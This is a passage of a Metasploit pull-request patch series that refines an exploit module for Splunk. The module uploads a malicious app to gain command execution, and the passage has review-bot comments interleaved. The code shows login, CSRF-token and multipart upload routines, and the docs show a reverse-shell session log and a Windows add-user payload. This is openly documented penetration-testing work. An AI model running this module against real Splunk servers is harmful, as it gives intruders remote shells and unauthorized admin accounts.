"#{@auth_cookies};", + 'cookie' => @auth_cookies, 'ctype' => "multipart/form-data; boundary=#{boundary}", 'data' => data }, 30) From 98a7938837143827c2f2a02f4f30db1ecc18e5b5 Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Tue, 19 Mar 2019 14:42:56 +0100 Subject: [PATCH 33/42] Update splunk_upload_app_exec.rb --- .../multi/http/splunk_upload_app_exec.rb | 16 ++++++---------- 1 file changed, 6 insertions(+), 10 deletions(-) 
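Review bot: The upload is posted to the hard-coded `/en-US/manager/appinstall/_upload`, and the same `en-US` prefix appears in the other paths this module requests elsewhere on this page; Splunk Web prefixes its URLs with the instance locale, so a target not served under `en-US` will presumably redirect or 404 these requests and the module fails without a useful message — worth confirming against a non-English install. Consider capturing the locale prefix from the login redirect or exposing it as an option, e.g. `'uri' => normalize_uri(datastore['TARGETURI'], 'manager', 'appinstall', '_upload')`. The cookie simplification itself looks fine. `do_upload_app_7` starts and ends outside the hunk.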
diff --git a/modules/exploits/multi/http/splunk_upload_app_exec.rb b/modules/exploits/multi/http/splunk_upload_app_exec.rb index 02702a3d3dde..624cff321ba5 100644 --- a/modules/exploits/multi/http/splunk_upload_app_exec.rb +++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb @@ -124,19 +124,18 @@ def exploit @state_token = '' @splunkweb_csrf_token_8000_id = '' @csrf_form_port = "splunkweb_csrf_token_#{rport}" # Default to using rport, corrected during tokenization for v6 below. - @ver7 = false # splunk version 7 boolean - + @ver7 = false # splunk version 7 boolean app_name = 'upload_app_exec' p = payload.encoded print_status("Using command: #{p}") cmd = Rex::Text.encode_base64(p) - # check if the target version is 7.2.4 + # check if the target version is 7.2.4 if target.name.include? "7.2.4" @ver7 = true end - do_login + do_login # fetch the csrf token for use in the upload next if @ver7 == true @@ -158,7 +157,7 @@ def exploit # get the next csrf token from our new app do_get_csrf("/en-US/app/#{app_name}/flashtimeline") end - + # call our command execution function with the Splunk 'script' command print_status("Invoking script command") if @ver7 == true @@ -345,7 +344,7 @@ def do_login @auth_cookies = "#{session_id_port}=#{session_id}" end end - + def do_upload_app(app_name, file_name) archive_file_name = ::File.basename(file_name) print_status("Uploading file #{archive_file_name}") 
@@ -397,21 +396,18 @@ def do_upload_app_7(app_name, file_name) data = "--#{boundary}\r\n" data << "Content-Disposition: form-data; name=\"state\"\r\n" data << "\r\n#{@state_token}\r\n" - data << "--#{boundary}\r\n" data << "Content-Disposition: form-data; name=\"splunk_form_key\"\r\n" data << "\r\n#{@splunkweb_csrf_token_8000_id}\r\n" - data << "--#{boundary}\r\n" data << "Content-Disposition: form-data; name=\"appfile\"; filename=\"#{archive_file_name}\"\r\n" data << "Content-Type: application/x-compressed-tar\r\n\r\n" data << file_data data << "\r\n--#{boundary}\r\n" - data << "Content-Disposition: form-data; name=\"force\"\r\n\r\n" data << "1" data << "\r\n--#{boundary}--\r\n" - + res = send_request_cgi( { 'uri' => '/en-US/manager/appinstall/_upload', From c9dcdf1b665e2c31e4dc745dc6ba94dd7242d4dd Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Tue, 19 Mar 2019 14:58:31 +0100 Subject: [PATCH 34/42] new error logic --- .../exploits/multi/http/splunk_upload_app_exec.rb | 15 +++++++++++---- 1 file changed, 11 insertions(+), 4 deletions(-) diff --git a/modules/exploits/multi/http/splunk_upload_app_exec.rb b/modules/exploits/multi/http/splunk_upload_app_exec.rb index 624cff321ba5..3ca94d1b4c25 100644 --- a/modules/exploits/multi/http/splunk_upload_app_exec.rb +++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb 
@@ -417,12 +417,19 @@ def do_upload_app_7(app_name, file_name) 'data' => data }, 30) - if res && (res.code == 303 || (res.code == 200 && res.body !~ /There was an error processing the upload/)) - print_good("#{app_name} successfully uploaded") - else + unless res + fail_with(Failure::Unreachable, "Connection failed") + end + + unless res.code == 303 || res.code == 200 + fail_with(Failure::UnexpectedReply, "Unexpected reply (HTTP #{res.code})") + end + + if res.body.include?('There was an error processing the upload') fail_with(Failure::Unknown, "Error uploading") end - end + + print_good("#{app_name} successfully uploaded") def do_get_csrf(uri) print_status("Fetching csrf token from #{uri}") From 92c163cb0da9f3372e950b2d2d87bece85ccace1 Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Tue, 19 Mar 2019 15:00:26 +0100 Subject: [PATCH 35/42] Update splunk_upload_app_exec.md --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index b73714c5f0f5..bb9dbc57fe0c 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -21,7 +21,8 @@ This module has been tested successfully against: 4. Do: ```SET LHOST [ip]``` 5. Do: ```SET RHOST [ip]``` - 8. * If targeting linux or macos the payload ```cmd/unix/reverse_python``` will be automatically selected. + 8. Set a payload: + * If targeting linux or macos the payload ```cmd/unix/reverse_python``` will be automatically selected. * If targeting windows the payload ```cmd/windows/adduser``` will be automatically selected. 7. You should get either a reverse shell on port 4444 via the predefined handler (Linux/OSX) or a new user in case (windows target) From 985f3748e54b8a4607be8c0f0904c359aa3d33c0 Mon Sep 17 00:00:00 2001 
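Review bot: The `- end` removed after the `fail_with(Failure::Unknown, "Error uploading")` block closed `do_upload_app_7`, and none of the added lines puts it back, so after this commit `def do_get_csrf(uri)` opens inside `do_upload_app_7` and the module no longer parses. Patch 36/42 later in this series appears to restore it, but each commit should load on its own; add `  end` directly after `print_good("#{app_name} successfully uploaded")` here (or squash 36 into this change). Separately, the new `Failure::Unknown` path throws away the server's status, so a rejected upload is indistinguishable in the log from the other failures; consider `fail_with(Failure::UnexpectedReply, "Error uploading (HTTP #{res.code})")` to keep that diagnostic. The method's header and the start of the `send_request_cgi` call lie outside this hunk.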
From: Matteo Malvica Date: Tue, 19 Mar 2019 15:08:51 +0100 Subject: [PATCH 36/42] Update splunk_upload_app_exec.rb --- modules/exploits/multi/http/splunk_upload_app_exec.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/splunk_upload_app_exec.rb b/modules/exploits/multi/http/splunk_upload_app_exec.rb index 3ca94d1b4c25..64ed0ff6ecd0 100644 --- a/modules/exploits/multi/http/splunk_upload_app_exec.rb +++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb @@ -430,7 +430,8 @@ def do_upload_app_7(app_name, file_name) end print_good("#{app_name} successfully uploaded") - + end + def do_get_csrf(uri) print_status("Fetching csrf token from #{uri}") res = send_request_cgi( From 418581d4d3fe28b7d9240a8a5dbb8689beb88b19 Mon Sep 17 00:00:00 2001 From: bcoles Date: Tue, 19 Mar 2019 15:11:06 +0100 Subject: [PATCH 37/42] Update documentation/modules/exploit/multi/http/splunk_upload_app_exec.md Co-Authored-By: avanzo --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 1 - 1 file changed, 1 deletion(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index bb9dbc57fe0c..51aad771ce43 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -20,7 +20,6 @@ This module has been tested successfully against: 3. Set required variables (you will need admin credentials) 4. Do: ```SET LHOST [ip]``` 5. Do: ```SET RHOST [ip]``` - 8. Set a payload: * If targeting linux or macos the payload ```cmd/unix/reverse_python``` will be automatically selected. * If targeting windows the payload ```cmd/windows/adduser``` will be automatically selected. From ed52ac685ddd700484700404bd7d73c86d39d0b1 Mon Sep 17 00:00:00 2001 
From: bcoles Date: Tue, 19 Mar 2019 15:11:18 +0100 Subject: [PATCH 38/42] Update documentation/modules/exploit/multi/http/splunk_upload_app_exec.md Co-Authored-By: avanzo --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index 51aad771ce43..2a6595e97e2a 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -20,7 +20,7 @@ This module has been tested successfully against: 3. Set required variables (you will need admin credentials) 4. Do: ```SET LHOST [ip]``` 5. Do: ```SET RHOST [ip]``` - 8. Set a payload: + 6. Set a payload: * If targeting linux or macos the payload ```cmd/unix/reverse_python``` will be automatically selected. * If targeting windows the payload ```cmd/windows/adduser``` will be automatically selected. From 91d4c00c371f0397e3076661883d91273f6b7b21 Mon Sep 17 00:00:00 2001 From: bcoles Date: Tue, 19 Mar 2019 15:11:30 +0100 Subject: [PATCH 39/42] Update documentation/modules/exploit/multi/http/splunk_upload_app_exec.md Co-Authored-By: avanzo --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index 2a6595e97e2a..a538752ad713 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -39,7 +39,7 @@ This module has been tested successfully against: Overwrites an app of the same name. Needed if you change the app code in the tgz. Default is `false` - **USERNAME** + **USERNAME** Default is `admin` **PASSWORD** 
From fe0adb9ca1656e0c5577242cbb12e614a1d13c15 Mon Sep 17 00:00:00 2001 From: bcoles Date: Tue, 19 Mar 2019 15:11:43 +0100 Subject: [PATCH 40/42] Update documentation/modules/exploit/multi/http/splunk_upload_app_exec.md Co-Authored-By: avanzo --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index a538752ad713..63ee18b08b96 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -40,7 +40,7 @@ This module has been tested successfully against: Default is `false` **USERNAME** - Default is `admin` + Username for Splunk. Default is `admin` **PASSWORD** Default is `changeme` From a2d6c77fb83a680bae6c36206ea2a4fde1a278fb Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Tue, 19 Mar 2019 15:28:24 +0100 Subject: [PATCH 41/42] indentation fixes --- .../multi/http/splunk_upload_app_exec.rb | 29 ++++++++++--------- 1 file changed, 15 insertions(+), 14 deletions(-) diff --git a/modules/exploits/multi/http/splunk_upload_app_exec.rb b/modules/exploits/multi/http/splunk_upload_app_exec.rb index 64ed0ff6ecd0..7718ddba875b 100644 --- a/modules/exploits/multi/http/splunk_upload_app_exec.rb +++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb @@ -430,8 +430,9 @@ def do_upload_app_7(app_name, file_name) end print_good("#{app_name} successfully uploaded") + end - + def do_get_csrf(uri) print_status("Fetching csrf token from #{uri}") res = send_request_cgi( 
@@ -457,19 +458,19 @@ def do_get_csrf(uri) # version 7.2.x only def do_get_state_token(uri) - print_status("Fetching state token from #{uri}") - res = send_request_cgi( - 'uri' => uri, - 'method' => 'GET', - 'cookie' => @auth_cookies - ) - #puts res - res.body.match('name=\"state\" value="(.*)"') # Version 5 - @state_token = Regexp.last_match(1) - - unless @state_token - fail_with(Failure::Unknown, "state token form Key not found") - end + print_status("Fetching state token from #{uri}") + res = send_request_cgi( + 'uri' => uri, + 'method' => 'GET', + 'cookie' => @auth_cookies + ) + #puts res + res.body.match('name=\"state\" value="(.*)"') # Version 5 + @state_token = Regexp.last_match(1) + + unless @state_token + fail_with(Failure::Unknown, "state token form Key not found") + end end def fetch_job_output(job_id) From 6b0f7fd9f1939eae3465a9346a2356548e0b8673 Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Tue, 19 Mar 2019 22:44:07 +0100 Subject: [PATCH 42/42] Update splunk_upload_app_exec.md --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index 63ee18b08b96..1801c0168f57 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -93,7 +93,7 @@ msf5 exploit(multi/http/splunk_upload_app_exec) > exploit [*] Command shell session 1 opened (172.16.165.206:4444 -> 172.16.165.1:51512) at 2019-03-17 22:12:33 +0100 ``` -### Tested against 7.2.4 splunk-5.0.1-143156 on Ubuntu 10.04 +### Tested against splunk-5.0.1-143156 on Ubuntu 10.04 ``` msf > use exploit/multi/http/splunk_upload_app_exec